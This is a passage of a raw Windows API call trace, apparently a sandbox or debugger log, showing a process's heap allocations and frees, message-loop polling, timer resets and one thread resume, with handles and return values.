[417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0203.017] ResumeThread (hThread=0x2d4) returned 0x1 [0203.142] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efa30 [0203.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x214) returned 0x1313098 [0203.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7418 [0203.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7478 [0203.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7430 [0203.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7520 [0203.143] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd40 [0203.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7520 | out: hHeap=0x12c0000) returned 1 [0203.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd40 | out: hHeap=0x12c0000) returned 1 [0203.143] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7430 | out: hHeap=0x12c0000) returned 1 [0203.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b73e8 [0203.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7550 [0203.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b76a0 [0203.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd40 [0203.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b76a0 | out: hHeap=0x12c0000) returned 1 [0203.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xd0) returned 0x132fff0 [0203.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14f83c0 | out: hHeap=0x12c0000) returned 1 [0203.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7598 [0203.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b76a0 [0203.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b75c8 [0203.144] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12f0080 [0203.144] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x15851a8 | out: hHeap=0x12c0000) returned 1 [0203.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b75e0 [0203.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b76b8 [0203.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7568 [0203.188] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12effa0 [0203.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7568 | out: hHeap=0x12c0000) returned 1 [0203.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effa0 | out: hHeap=0x12c0000) returned 1 [0203.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b76b8 | out: hHeap=0x12c0000) returned 1 [0203.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12effe0 | out: hHeap=0x12c0000) returned 1 [0203.188] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12f00b0 | out: hHeap=0x12c0000) returned 1 [0203.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efff0 | out: hHeap=0x12c0000) returned 1 [0203.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fff50 | out: hHeap=0x12c0000) returned 1 [0203.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7190 | out: hHeap=0x12c0000) returned 1 [0203.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7370 | out: hHeap=0x12c0000) returned 1 [0203.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7238 | out: hHeap=0x12c0000) returned 1 [0203.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7148 | out: hHeap=0x12c0000) returned 1 [0203.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7268 | out: hHeap=0x12c0000) returned 1 [0203.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70d0 | out: hHeap=0x12c0000) returned 1 [0203.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7178 | out: hHeap=0x12c0000) returned 1 [0203.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7208 | out: hHeap=0x12c0000) returned 1 [0203.189] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7388 | out: hHeap=0x12c0000) returned 1 [0203.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b71c0 | out: hHeap=0x12c0000) returned 1 [0203.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70e8 | out: hHeap=0x12c0000) returned 1 [0203.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b72c8 | out: hHeap=0x12c0000) returned 1 [0203.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b71d8 | out: hHeap=0x12c0000) returned 1 [0203.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b71f0 | out: hHeap=0x12c0000) returned 1 [0203.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7118 | out: hHeap=0x12c0000) returned 1 [0203.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300270 | out: hHeap=0x12c0000) returned 1 [0203.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70b8 | out: hHeap=0x12c0000) returned 1 [0203.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7010 | out: hHeap=0x12c0000) returned 1 [0203.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f08 | out: hHeap=0x12c0000) returned 1 [0203.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f98 | out: hHeap=0x12c0000) returned 1 [0203.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6fe0 | out: hHeap=0x12c0000) returned 1 [0203.190] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ef0 | out: hHeap=0x12c0000) returned 1 [0203.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f20 | out: hHeap=0x12c0000) returned 1 [0203.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f50 | out: hHeap=0x12c0000) returned 1 [0203.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7028 | out: hHeap=0x12c0000) returned 1 [0203.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f38 | out: hHeap=0x12c0000) returned 1 [0203.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b70a0 | out: hHeap=0x12c0000) returned 1 [0203.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ec0 | out: hHeap=0x12c0000) returned 1 [0203.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ed8 | out: hHeap=0x12c0000) returned 1 [0203.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7088 | out: hHeap=0x12c0000) returned 1 [0203.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6dd0 | out: hHeap=0x12c0000) returned 1 [0203.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f68 | out: hHeap=0x12c0000) returned 1 [0203.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6f80 | out: hHeap=0x12c0000) returned 1 [0203.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e18 | out: hHeap=0x12c0000) returned 1 [0203.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6fb0 | out: hHeap=0x12c0000) returned 1 [0203.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e30 | out: hHeap=0x12c0000) returned 1 [0203.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6de8 | out: hHeap=0x12c0000) returned 1 [0203.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7040 | out: hHeap=0x12c0000) returned 1 [0203.191] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e48 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e90 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e60 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ea8 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b73b8 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b72e0 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7220 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7100 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7358 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b73a0 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7298 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7328 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b72b0 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b71a8 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7340 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7280 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7310 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b72f8 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7130 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7160 | out: hHeap=0x12c0000) returned 1 [0203.192] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x131d968 | out: hHeap=0x12c0000) returned 1 [0203.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6e00 | out: hHeap=0x12c0000) returned 1 [0203.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd00 | out: hHeap=0x12c0000) returned 1 [0203.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.193] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12efd00 [0203.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efa30 | out: hHeap=0x12c0000) returned 1 [0203.193] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.193] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0203.194] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0203.194] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0203.194] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0203.194] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0203.194] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.194] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300270 [0203.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b6ef0 [0203.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b6ef0 | out: hHeap=0x12c0000) returned 1 [0203.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300270 | out: hHeap=0x12c0000) returned 1 [0203.195] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.195] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.195] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300158 [0203.195] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7010 [0203.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0203.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0203.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7010 | out: hHeap=0x12c0000) returned 1 [0203.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300158 | out: hHeap=0x12c0000) returned 1 [0203.196] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x1300108 [0203.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14b7088 [0203.196] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.196] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14b7088 | out: hHeap=0x12c0000) returned 1 [0203.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300108 | out: hHeap=0x12c0000) returned 1 [0203.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0203.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0203.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0203.197] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.197] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.197] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132dfc0 [0203.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132dfc0 | out: hHeap=0x12c0000) returned 1 [0203.198] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.198] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.198] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.199] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.199] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e540 [0203.199] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.199] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e540 | out: hHeap=0x12c0000) returned 1 [0203.199] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.199] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.199] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.199] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.199] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e500 [0203.199] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.199] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e500 | out: hHeap=0x12c0000) returned 1 [0203.200] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.200] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.200] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.200] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.200] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.200] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.200] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.200] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0203.200] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.200] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0203.200] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.200] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.200] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.200] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13166c0 [0203.200] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13166c0 | out: hHeap=0x12c0000) returned 1 [0203.200] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.200] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.200] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e340 [0203.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e340 | out: hHeap=0x12c0000) returned 1 [0203.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.201] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efe30 [0203.201] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 [0203.201] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1316600 [0203.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1316600 | out: hHeap=0x12c0000) returned 1 [0203.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efd30 | out: hHeap=0x12c0000) returned 1 [0203.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12efe30 | out: hHeap=0x12c0000) returned 1 [0203.201] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e000 [0203.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.201] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e000 | out: hHeap=0x12c0000) returned 1 [0203.201] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0203.201] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12efd30 